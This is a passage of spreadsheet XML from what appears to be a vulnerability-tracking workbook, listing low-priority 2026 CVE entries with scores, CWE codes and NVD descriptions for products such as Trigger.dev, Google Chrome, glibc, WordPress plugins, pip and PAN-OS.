          <t>Trigger.dev is a platform for building and deploying fully managed AI agents and workflows. From 4.4.2 until 4.5.0-rc.4, `POST /api/v1/runs/:runParam/replay` in apps/webapp/app/routes/api.v1.runs.$runParam.replay.ts uses `prisma.taskRun.findUnique({ where: { friendlyId: runParam } })` without a runtimeEnvironmentId filter, then ReplayTaskRunService in apps/webapp/app/v3/services/replayTaskRun.server.ts replays the selected run in the victim environment. Any valid environment API key can therefore replay another tenant's run by friendlyId, consuming victim resources and repeating side effects; when `payloadType: "application/store"` is used, overrideExistingPayloadPacket() calls conditionallyImportPacket() on existingTaskRun.payload without an integrity check, so payload bytes overwritten through a separate object-store path-traversal vulnerability become attacker-controlled input to the victim task. This issue is fixed in version 4.5.0-rc.4.</t>
        </is>
      </c>
      <c r="M5736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73657</t>
        </is>
      </c>
    </row>
    <row r="5737">
      <c r="A5737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87432</t>
        </is>
      </c>
      <c r="C5737" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5737" s="5" t="inlineStr"/>
      <c r="F5737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5737" s="5" t="inlineStr"/>
      <c r="H5737" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5737" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5737" s="5" t="inlineStr"/>
      <c r="K5737" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5737" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87432</t>
        </is>
      </c>
    </row>
    <row r="5738">
      <c r="A5738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87465</t>
        </is>
      </c>
      <c r="C5738" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5738" s="5" t="inlineStr"/>
      <c r="F5738" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5738" s="5" t="inlineStr"/>
      <c r="H5738" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5738" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5738" s="5" t="inlineStr"/>
      <c r="K5738" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5738" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87465</t>
        </is>
      </c>
    </row>
    <row r="5739">
      <c r="A5739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87472</t>
        </is>
      </c>
      <c r="C5739" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5739" s="5" t="inlineStr"/>
      <c r="F5739" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5739" s="5" t="inlineStr"/>
      <c r="H5739" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5739" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5739" s="5" t="inlineStr"/>
      <c r="K5739" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5739" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87472</t>
        </is>
      </c>
    </row>
    <row r="5740">
      <c r="A5740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87502</t>
        </is>
      </c>
      <c r="C5740" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5740" s="5" t="inlineStr"/>
      <c r="F5740" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5740" s="5" t="inlineStr"/>
      <c r="H5740" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5740" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5740" s="5" t="inlineStr"/>
      <c r="K5740" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L5740" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in Fullscreen in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87502</t>
        </is>
      </c>
    </row>
    <row r="5741">
      <c r="A5741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87538</t>
        </is>
      </c>
      <c r="C5741" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5741" s="5" t="inlineStr"/>
      <c r="F5741" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5741" s="5" t="inlineStr"/>
      <c r="H5741" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5741" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5741" s="5" t="inlineStr"/>
      <c r="K5741" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L5741" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87538</t>
        </is>
      </c>
    </row>
    <row r="5742">
      <c r="A5742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87559</t>
        </is>
      </c>
      <c r="C5742" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5742" s="5" t="inlineStr"/>
      <c r="F5742" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5742" s="5" t="inlineStr"/>
      <c r="H5742" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5742" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5742" s="5" t="inlineStr"/>
      <c r="K5742" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5742" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in UI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87559</t>
        </is>
      </c>
    </row>
    <row r="5743">
      <c r="A5743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87624</t>
        </is>
      </c>
      <c r="C5743" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5743" s="5" t="inlineStr"/>
      <c r="F5743" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5743" s="5" t="inlineStr"/>
      <c r="H5743" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5743" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5743" s="5" t="inlineStr"/>
      <c r="K5743" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5743" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87624</t>
        </is>
      </c>
    </row>
    <row r="5744">
      <c r="A5744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87641</t>
        </is>
      </c>
      <c r="C5744" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5744" s="5" t="inlineStr"/>
      <c r="F5744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5744" s="5" t="inlineStr"/>
      <c r="H5744" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5744" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5744" s="5" t="inlineStr"/>
      <c r="K5744" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5744" s="5" t="inlineStr">
        <is>
          <t>Race condition in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87641</t>
        </is>
      </c>
    </row>
    <row r="5745">
      <c r="A5745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89092</t>
        </is>
      </c>
      <c r="C5745" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5745" s="5" t="inlineStr"/>
      <c r="F5745" s="5" t="inlineStr"/>
      <c r="G5745" s="5" t="inlineStr"/>
      <c r="H5745" s="5" t="inlineStr"/>
      <c r="I5745" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5745" s="5" t="inlineStr"/>
      <c r="K5745" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L5745" s="5" t="inlineStr">
        <is>
          <t>The nscd service in the GNU C Library 2.3.4 onwards may crash due to a 
stack overflow when a malicious DNS server returns too large a response 
for a DNS query, resulting in degraded DNS resolution for the system.
Exploitation of this bug needs a system that has nscd enabled and using 
an untrusted DNS server for name resolution, with the compromised DNS 
server being capable of processing records large enough to result in a 
stack overflow in an nscd thread stack.  During experimentation, bind 9 
was unable to handle large records, but that could change in future or 
with a different name server.  In typical installations, nscd is 
executed in an isolated context as its own user without a shell, due to 
which any compromise of that service is isolated.
There is a remote possibility of nscd cache corruption if an attacker 
manages to get the stack pointer into a desired point in the heap, 
potentially resulting in other caches in nscd being overwritten with 
corrupt data through the stack overflow, until the buggy code path 
eventually results in a crash.
Finally, a crash in nscd may result in performance degradation when 
resolving names, but it does not result in a denial of service.</t>
        </is>
      </c>
      <c r="M5745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89092</t>
        </is>
      </c>
    </row>
    <row r="5746">
      <c r="A5746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0295</t>
        </is>
      </c>
      <c r="C5746" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5746" s="5" t="inlineStr"/>
      <c r="F5746" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5746" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H5746" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I5746" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5746" s="5" t="inlineStr"/>
      <c r="K5746" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5746" s="5" t="inlineStr">
        <is>
          <t>A race condition in the Palo Alto Networks GlobalProtect™ client on macOS enables a locally authenticated low-privileged attacker to escalate their privileges to root.
The GlobalProtect app on Linux, Windows, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M5746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0295</t>
        </is>
      </c>
    </row>
    <row r="5747">
      <c r="A5747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16647</t>
        </is>
      </c>
      <c r="C5747" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5747" s="5" t="inlineStr"/>
      <c r="F5747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5747" s="5" t="inlineStr"/>
      <c r="H5747" s="5" t="inlineStr">
        <is>
          <t>zyxware:disable_login_page</t>
        </is>
      </c>
      <c r="I5747" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5747" s="5" t="inlineStr"/>
      <c r="K5747" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L5747" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass. This issue affects Disable Login Page versions: from 0.0.0 to 1.1.4.</t>
        </is>
      </c>
      <c r="M5747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16647</t>
        </is>
      </c>
    </row>
    <row r="5748">
      <c r="A5748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63466</t>
        </is>
      </c>
      <c r="C5748" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5748" s="5" t="inlineStr"/>
      <c r="F5748" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5748" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H5748" s="5" t="inlineStr"/>
      <c r="I5748" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5748" s="5" t="inlineStr"/>
      <c r="K5748" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L5748" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 8.0.3, FeatureEventFormatterMd.format in src/lib/addons/feature-event-formatter-md.ts assigns Mustache.escape to an identity function before rendering action and path templates. Because Mustache.escape is process-wide, the assignment disables escaping for subsequent Mustache.render calls in email-service.ts, webhook.ts, datadog.ts, and new-relic.ts. An editor-level user can place Slack or Microsoft Teams link syntax in an unrestricted username, trigger a feature event, and inject an attacker-labeled link into a trusted outbound notification channel, while other Mustache sinks remain unescaped until restart. This issue is fixed in version 8.0.3.</t>
        </is>
      </c>
      <c r="M5748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63466</t>
        </is>
      </c>
    </row>
    <row r="5749">
      <c r="A5749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70480</t>
        </is>
      </c>
      <c r="C5749" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5749" s="5" t="inlineStr"/>
      <c r="F5749" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5749" s="5" t="inlineStr"/>
      <c r="H5749" s="5" t="inlineStr"/>
      <c r="I5749" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5749" s="5" t="inlineStr"/>
      <c r="K5749" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5749" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.6.34 until 0.11.0, Open WebUI renders vega and vega-lite fenced code blocks in chat content by building a Vega view in the viewer browser without a restricted resource loader. Any user who can place such a block where another user will see it can make that user browser issue attacker-chosen outbound GET requests and read responses from same-origin or CORS-permissive targets into the rendered page. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M5749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70480</t>
        </is>
      </c>
    </row>
    <row r="5750">
      <c r="A5750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70591</t>
        </is>
      </c>
      <c r="C5750" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5750" s="5" t="inlineStr"/>
      <c r="F5750" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5750" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5750" s="5" t="inlineStr"/>
      <c r="I5750" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5750" s="5" t="inlineStr"/>
      <c r="K5750" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5750" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 0.10.0 until 6.54.1, a Server-Side Request Forgery in Ghost Admin image fetching allowed any staff-level user to perform a blind HTTP GET request against internal hosts. No output was returned, but this could have been used to probe open ports on internal hosts. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M5750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70591</t>
        </is>
      </c>
    </row>
    <row r="5751">
      <c r="A5751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71555</t>
        </is>
      </c>
      <c r="C5751" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5751" s="5" t="inlineStr"/>
      <c r="F5751" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5751" s="5" t="inlineStr"/>
      <c r="H5751" s="5" t="inlineStr"/>
      <c r="I5751" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5751" s="5" t="inlineStr"/>
      <c r="K5751" s="5" t="inlineStr">
        <is>
          <t>CWE-1022</t>
        </is>
      </c>
      <c r="L5751" s="5" t="inlineStr">
        <is>
          <t>PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. From 2.1.0 until 4.14.1, PILOS does not send a Cross-Origin-Opener-Policy response header, so pages opened by PILOS via a link that opens a new browsing context (e.g., target="_blank") retain a window.opener reference back to the originating PILOS tab. A malicious destination page reached this way can use window.opener to navigate or manipulate the original PILOS tab, a technique known as reverse tabnabbing, potentially redirecting an authenticated user to a phishing page that mimics PILOS. This issue is fixed in version 4.14.1.</t>
        </is>
      </c>
      <c r="M5751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71555</t>
        </is>
      </c>
    </row>
    <row r="5752">
      <c r="A5752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82186</t>
        </is>
      </c>
      <c r="C5752" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5752" s="5" t="inlineStr"/>
      <c r="F5752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5752" s="5" t="inlineStr"/>
      <c r="H5752" s="5" t="inlineStr"/>
      <c r="I5752" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5752" s="5" t="inlineStr"/>
      <c r="K5752" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5752" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not properly validate a pagination parameter before using it in a SQL query, allowing users with administrator privileges to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="M5752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82186</t>
        </is>
      </c>
    </row>
    <row r="5753">
      <c r="A5753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83543</t>
        </is>
      </c>
      <c r="C5753" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5753" s="5" t="inlineStr"/>
      <c r="F5753" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5753" s="5" t="inlineStr"/>
      <c r="H5753" s="5" t="inlineStr"/>
      <c r="I5753" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5753" s="5" t="inlineStr"/>
      <c r="K5753" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5753" s="5" t="inlineStr">
        <is>
          <t>The Greenshift  WordPress plugin before 13.2.0 does not validate a user-supplied URL before fetching it server-side, allowing users with contributor-level access and above to make the server issue requests to arbitrary hosts and read the response.</t>
        </is>
      </c>
      <c r="M5753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83543</t>
        </is>
      </c>
    </row>
    <row r="5754">
      <c r="A5754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84113</t>
        </is>
      </c>
      <c r="C5754" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5754" s="5" t="inlineStr"/>
      <c r="F5754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5754" s="5" t="inlineStr"/>
      <c r="H5754" s="5" t="inlineStr"/>
      <c r="I5754" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5754" s="5" t="inlineStr"/>
      <c r="K5754" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5754" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not properly sanitise and escape a parameter before using it in an SQL query, allowing high privilege users such as administrators to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="M5754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84113</t>
        </is>
      </c>
    </row>
    <row r="5755">
      <c r="A5755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8643</t>
        </is>
      </c>
      <c r="C5755" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5755" s="5" t="inlineStr"/>
      <c r="F5755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5755" s="5" t="inlineStr"/>
      <c r="H5755" s="5" t="inlineStr">
        <is>
          <t>pypa:pip</t>
        </is>
      </c>
      <c r="I5755" s="5" t="inlineStr">
        <is>
          <t>2026-06-01</t>
        </is>
      </c>
      <c r="J5755" s="5" t="inlineStr"/>
      <c r="K5755" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5755" s="5" t="inlineStr">
        <is>
          <t>pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.</t>
        </is>
      </c>
      <c r="M5755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8643</t>
        </is>
      </c>
    </row>
    <row r="5756">
      <c r="A5756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89169</t>
        </is>
      </c>
      <c r="C5756" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D5756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5756" s="5" t="inlineStr"/>
      <c r="F5756" s="5" t="inlineStr"/>
      <c r="G5756" s="5" t="inlineStr"/>
      <c r="H5756" s="5" t="inlineStr"/>
      <c r="I5756" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5756" s="5" t="inlineStr"/>
      <c r="K5756" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L5756" s="5" t="inlineStr">
        <is>
          <t>live-boot ff8867c allows attackers to bypass the dm-verity-enforce-roothash-signature protection mechanism when the .verity file is missing.</t>
        </is>
      </c>
      <c r="M5756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89169</t>
        </is>
      </c>
    </row>
    <row r="5757">
      <c r="A5757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0309</t>
        </is>
      </c>
      <c r="C5757" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5757" s="5" t="inlineStr"/>
      <c r="F5757" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5757" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H5757" s="5" t="inlineStr"/>
      <c r="I5757" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5757" s="5" t="inlineStr"/>
      <c r="K5757" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L5757" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. To be able to exploit this issue, the user must have access to the PAN-OS CLI and the device must be configured with a Luna Hardware Security Module (HSM). 
The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.
